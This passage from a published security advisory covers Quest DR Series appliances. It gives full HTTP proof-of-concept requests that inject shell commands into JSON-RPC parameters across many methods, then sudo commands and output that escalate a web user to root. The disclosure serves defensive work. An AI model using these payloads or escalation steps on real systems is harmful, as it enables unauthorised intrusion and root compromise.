Connection: close

{
"jsonrpc": "2.0",
"method": "start",
"params": {
"classname": "DRReplications",
"name": "'; sleep 15; #"
},
"id": 1
}
-----/

7.28. *Command injection in the stop replication method*

[CVE-2018-11170]
The 'stop' replication functionality was also found to be vulnerable to
command injection.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 106
Connection: close

{
"jsonrpc": "2.0",
"method": "stop",
"params": {
"classname": "DRReplications",
"name": "'; sleep 15; #"
},
"id": 1
}
-----/

7.29. *Command injection in the delete replication method*

[CVE-2018-11171]
Deleting a replicaton is yet another way in which authenticated attackers
could abuse the 'ReplicationsService' module in order to execute system
commands in the context of the web application.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 106
Connection: close

{
"jsonrpc": "2.0",
"method": "delete",
"params": {
"classname": "DRReplications",
"name": "'; sleep 15; #"
},
"id": 1
}
-----/

7.30. *Command injection in the set hostname method*

[CVE-2018-11172]
The system hostname can be updated via the 'HostnameService' exposed
functionality. Request parameters are not sanitized.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 104
Connection: close

{
"jsonrpc": "2.0",
"method": "set",
"params": {
"classname": "DRHostname",
"hostname": "; sleep 10; #"
},
"id": 1
}
-----/

7.31. *Command injection in the add email alert method*

[CVE-2018-11173]
Attackers can inject system commands by requesting to add an email alert and
providing a malicious email address containing the payload.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 112
Connection: close

{
"jsonrpc": "2.0",
"method": "add",
"params": {
"classname": "DREmailAlerts",
"emailAddress": "'; sleep 10; #"
},
"id": 1
}
-----/

7.32. *Command injection in the delete email alert method*

[CVE-2018-11174]
Analogous to the email alert 'add' subroutine, the 'delete' email alert
counterpart is also vulnerable to command injection because of an
unsanitized
email address parameter.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 115
Connection: close

{
"jsonrpc": "2.0",
"method": "delete",
"params": {
"classname": "DREmailAlerts",
"emailAddress": "'; sleep 10; #"
},
"id": 1
}
-----/

7.33. *Command injection in the setBandwidthLimit method*

[CVE-2018-11175]
The DR series appliance can be configured to enforce different limits over
the network traffic. This functionality is handled by the
'NetworkInterfacesServices' module and its 'setBandwidthLimit' subroutine
was found to be vulnerable to command injection.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 154
Connection: close

{
"jsonrpc": "2.0",
"method": "setBandwidthLimit",
"params": {
"classname": "DRNetworkInterface",
"bandwidthUnit": "default",
"targetIp": "; sleep 10; #"
},
"id": 1
}
-----/

7.34. *Command injection in the set_passphrase method*

[CVE-2018-11176]
A DR series system can be configured to use encryption at rest. The method
that sets the passphrase can be abused by attackers to execute arbitrary
system commands.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 119
Connection: close

{
"jsonrpc": "2.0",
"method": "set_passphrase",
"params": {
"classname": "DREncryption",
"passphrase": "; sleep 10; #"
},
"id": 1
}
-----/

7.35. *Command injection in the set_encryption_settings method*

[CVE-2018-11177]
Different encryption settings can be configured, such as the encryption mode
and the key rotation interval. These parameters are taken from the user
generated request and used as components of a command string, therefore
allowing attackers to inject arbitrary system commands.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 128
Connection: close

{
"jsonrpc": "2.0",
"method": "set_encryption_settings",
"params": {
"classname": "DREncryption",
"encryption": "; sleep 10; #"
},
"id": 1
}
-----/

7.36. *Command injection in the start_filesystem method*

[CVE-2018-11178]
Several features implemented in the 'StartupPassphraseService' module were
found to be vulnerable to command injection. In particular, the
'start_filesystem'
subroutine takes a user supplied passphrase to construct a system command.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 129
Connection: close

{
"jsonrpc": "2.0",
"method": "start_filesystem",
"params": {
"classname": "DRStartupPassphrase",
"passphrase": "'; sleep 10; #"
},
"id": 1
}
-----/

7.37. *Command injection in the save_configuration method*

[CVE-2018-11179]
Saving startup configuration was also found to be prone to command injection
issues.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 151
Connection: close

{
"jsonrpc": "2.0",
"method": "save_configuration",
"params": {
"classname": "DRStartupPassphrase",
"status": "pepito",
"passphrase": "'; sleep 10; #"
},
"id": 1
}
-----/

7.38. *Command injection in the cloud portal register method*

[CVE-2018-11180]
The 'CloudPortal' module allows to register an agent with the cloud portal
system. Its 'register' subroutine was found to be vulnerable to command
injection via the 'registrationCode' request parameter.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 120
Connection: close

{
"jsonrpc": "2.0",
"method": "register",
"params": {
"classname": "DRCloudPortal",
"registrationCode": "; sleep 10; #"
},
"id": 1
}
-----/

7.39. *Command injection in the customer portal register method*

[CVE-2018-11181]
The subroutine in charge of registering the DR series appliance with the
Quest Customer Portal could be abused by an authenticated attacker to
execute system commands via a specially crafted 'token' request parameter.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 112
Connection: close

{
"jsonrpc": "2.0",
"method": "register",
"params": {
"classname": "DRCustomerPortal",
"token": "; sleep 10; #"
},
"id": 1
}
-----/

7.40. *Command injection in the customer portal changeManageBtn method*

[CVE-2018-11182]
Customer portal integration supports changing the manage button action.
This functionality was found to be vulnerable via the 'action' parameter.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 120
Connection: close

{
"jsonrpc": "2.0",
"method": "changeManageBtn",
"params": {
"classname": "DRCustomerPortal",
"action": "; sleep 10; #"
},
"id": 1
}
-----/

7.41. *Command injection in the set DNS method*

[CVE-2018-11183]
The 'set' subroutine in the 'DnsService' module allows users to configure
the DNS servers used. When setting new DNS server configuration, several
user supplied parameters are used to build a command line string without
applying any sanitization, therefore leading to command injection.


Proof of concept:


/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 101
Connection: close

{
"jsonrpc": "2.0",
"method": "set",
"params": {
"classname": "DRDns",
"dns_suffix": "; sleep 10; #"
},
"id": 1
}
-----/


7.42. *Command injection in the get usage method*

[CVE-2018-11184]
The 'UsageService' module allows administrators to monitor system usage.
A single subroutine processes the user's query and returns the corresponding
statistics.

The following proof of concept exploits the 'usage' type.

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 114
Connection: close

{
"jsonrpc": "2.0",
"method": "get",
"params": {
"classname": "DRUsage",
"type": "usage",
"width": "; sleep 10; #"
},
"id": 1
}
-----/

7.43. *Command injection in the support portal register method*

[CVE-2018-11185]
DR series systems can be registered with the Quest Support Portal.
Registered
systems collect certain information such as operational statistics,
performance
metrics, diagnostic information and configuration settings, which are then
transmitted to Quest in order to help troubleshoot system problems.

The subroutine implementing the registration functionality with the Support
Portal was found to be vulnerable to command injection via the 'email'
parameter.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 111
Connection: close

{
"jsonrpc": "2.0",
"method": "register",
"params": {
"classname": "DRSupportPortal",
"email": "; sleep 10; #"
},
"id": 1
}
-----/

7.44. *Command injection in the setDateAndTime method*

[CVE-2018-11186]
Attackers can execute arbitrary system commands by configuring a custom
timezone.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 115
Connection: close

{
"jsonrpc": "2.0",
"method": "setDateAndTime",
"params": {
"classname": "DRDateTime",
"timezone": "; sleep 10; #"
},
"id": 1
}

-----/


7.45. *Command injection in the global view add_member method*

[CVE-2018-11187]
GlobalView is a dashboard view providing a global picture of all the DR
Series systems in an organization. The functionality to add a new system
was found to be vulnerable to command injection via the 'RemoteHost'
parameter.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 165
Connection: close

{
"jsonrpc": "2.0",
"method": "add_member",
"params": {
"classname": "DRGlobalView",
"UserName": "pepito",
"Password": "pepito123",
"RemoteHost": "; sleep 10; echo "
},
"id": 1
}
-----/

7.46. *Command injection in the global view reconnect_member method*

[CVE-2018-11188]
Reconnecting a disconnected system in the Global View page can also result
in arbitrary command execution.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 171
Connection: close

{
"jsonrpc": "2.0",
"method": "reconnect_member",
"params": {
"classname": "DRGlobalView",
"UserName": "pepito",
"Password": "pepito123",
"RemoteHost": "; sleep 10; echo "
},
"id": 1
}
-----/

7.47. *Privilege escalation from web server user to root via perl*

[CVE-2018-11189]
The web server is running as the webadmin user. Exploiting any of the
command injection vulnerabilities oulined in the previous sections would
then result in 'webadmin' level access.

The webadmin user has sudo access to run the perl interpreter as root,
presumably to operate the various scripts that are called from the web
application. However, this means that an attacker who manages to execute
code in the context of the web server can easily escalate user privileges
to root by running arbitrary code via the perl interpreter.

/-----
sh-3.2$ id
uid=154(webadmin) gid=154(webadmin) groups=0(root),154(webadmin)
sh-3.2$ sudo perl -e 'system("/bin/bash")'

id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

-----/

7.48. *Privilege escalation from web server user to root via env*

[CVE-2018-11190]
The webadmin user has sudo access to run the /bin/env binary with root
permissions, resulting in direct privilege escalation.

/-----
webadmin@dr2k-1thv-dsmoke-01 > sudo env -i /bin/sh
sh-3.2# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
-----/

7.49. *Privilege escalation from web server user to root via local scripts*

[CVE-2018-11191]
The webadmin user is allowed to run local configuration scripts located in
/usr/local/bin with root level permissions and without requiring a password.
In particular, there is an 'exec.sh' shell script that allows users to
execute
arbitrary commands. Because it can be run via sudo, this results once again
in privilege escalation to root.

/-----
webadmin@dr2k-1thv-dsmoke-01 > id
uid=154(webadmin) gid=154(webadmin) groups=0(root),154(webadmin)
webadmin@dr2k-1thv-dsmoke-01 > sudo /usr/local/bin/exec.sh /bin/bash

NOTICE: To capture 'service' session output please use 'capture' command.
Type 'exit' to stop the capture.

Total alert messages : 0

service@dr2k-1thv-dsmoke-01 > id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
-----/

7.50. *Privilege escalation from web server user to root via strace*

[CVE-2018-11192]
The strace binary can be run by the webadmin user with root privileges.
In reality, this means that arbitrary processes are run as root, opening
another vector to escalate privileges once the web server is compromised.

/-----
webadmin@dr2k-1thv-dsmoke-01 > id
uid=154(webadmin) gid=154(webadmin) groups=0(root),154(webadmin)
webadmin@dr2k-1thv-dsmoke-01 > sudo strace /usr/bin/id
[...]
read(3, "root:x:0:root,admin,administrato"..., 4096) = 731
close(3) = 0
munmap(0x2ba34633d000, 4096) = 0
write(1, "uid=0(root) gid=0(root) groups=0"..., 88uid=0(root)
gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
) = 88
close(1) = 0
munmap(0x2ba34633c000, 4096) = 0
exit_group(0) = ?
-----/

7.51. *Privilege escalation from web server user to root via ocashell*

[CVE-2018-11193]
The ocashell script located in the /usr/local/bin directory spawns a bash
shell and can be executed by the webadmin user via sudo. This results in a
command line shell with root privileges.

/-----
webadmin@dr2k-1thv-dsmoke-01 > sudo /usr/local/bin/ocashell

NOTICE: To capture 'service' session output please use 'capture' command.
Type 'exit' to stop the capture.

Total alert messages : 0

service@dr2k-1thv-dsmoke-01 > id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
-----/


7.52. *Privilege escalation from web server user to root via setsid*

[CVE-2018-11194]
Another command that can be run via sudo once code execution as the webadmin
user is achieved is the /usr/bin/setsid binary. This binary is used to run a
program in a new session, resulting in local privilege escalation to root.

/-----
webadmin@dr2k-1thv-dsmoke-01 > sudo /usr/bin/setsid id > /tmp/pepito
webadmin@dr2k-1thv-dsmoke-01 > cat /tmp/pepito
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
-----/

8. *Report Timeline*
2018-01-31: Core Security sent an initial notification to Quest Software
Inc.
(Quest), asking for GPG keys in order to send draft advisory.
2018-01-31: Quest Support answered asking for the advisory in clear text.
2018-01-31: Core Security sent the draft advisory in clear text form.
2018-01-31: Quest Support replied that they received the draft advisory
and that they would review it.
2018-02-07: Core Security requested an update from Quest regarding the
reported vulnerabilities and a tentative schedule.
2018-02-07: Quest Support answered that it opened a bug id to track the
fixes and asked Core Security for a tentative publication date.
2018-02-07: Core Security answered saying that its intention is to
coordinate
the release in conjunction adjusting the schedule to the Quest's
development
timeline.
2018-02-08: Quest Support replied that engineering is testing the fixes and
they should have an estimate timeline the week of 12 February.
2018-02-15: Core Security requested a status update.
2018-02-22: Core Security again requested a status update and an estimated
timescale.
2018-02-22: Quest Support answered that it is trying to get an update from
the engineering team.
2018-03-01: Core Security requested a status update and a solidified
timeline.
2018-03-01: Quest Support replied saying that engineering is planning to
have a patch ready by the end of March.
2018-03-01: Core Security thanked the follow up and replied saying that
it will contact Quest in two weeks.
2018-03-15: Core Security requested a status update.
2018-03-26: Core Security requested a status update again.
2018-03-26: Quest Support answered saying it will get an update from the
engineering team.
2018-04-10: Quest Support informed that the latest build 4.0.3.1 addresses
the vulnerabilities that were reported.
2018-04-10: Core Security asked if all the vulnerabilities reported are
addressed by this build.
2018-05-31: Advisory CORE-2018-0002 published.

9. *References*

[1] https://www.quest.com/products/dr-series-disk-backup-appliances/

10. *About CoreLabs*

CoreLabs, the research center of Core Security, is charged with anticipating
the future needs and requirements for information security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at:
http://corelabs.coresecurity.com.

11. *About Core Security*

Core Security provides companies with the security insight they need to
know who, how, and what is vulnerable in their organization. The company's
threat-aware, identity & access, network security, and vulnerability
management solutions provide actionable insight and context needed to
manage security risks across the enterprise. This shared insight gives
customers a comprehensive view of their security posture to make better
security remediation decisions. Better insight allows organizations to
prioritize their efforts to protect critical assets, take action sooner
to mitigate access risk, and react faster if a breach does occur.

Core Security is headquartered in the USA with offices and operations in
South America, Europe, Middle East and Asia. To learn more, contact Core
Security at (678) 304-4500 or [email protected]

12. *Disclaimer*

The contents of this advisory are copyright (c) 2018 Core Security and
(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security advisories
team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.




Related Posts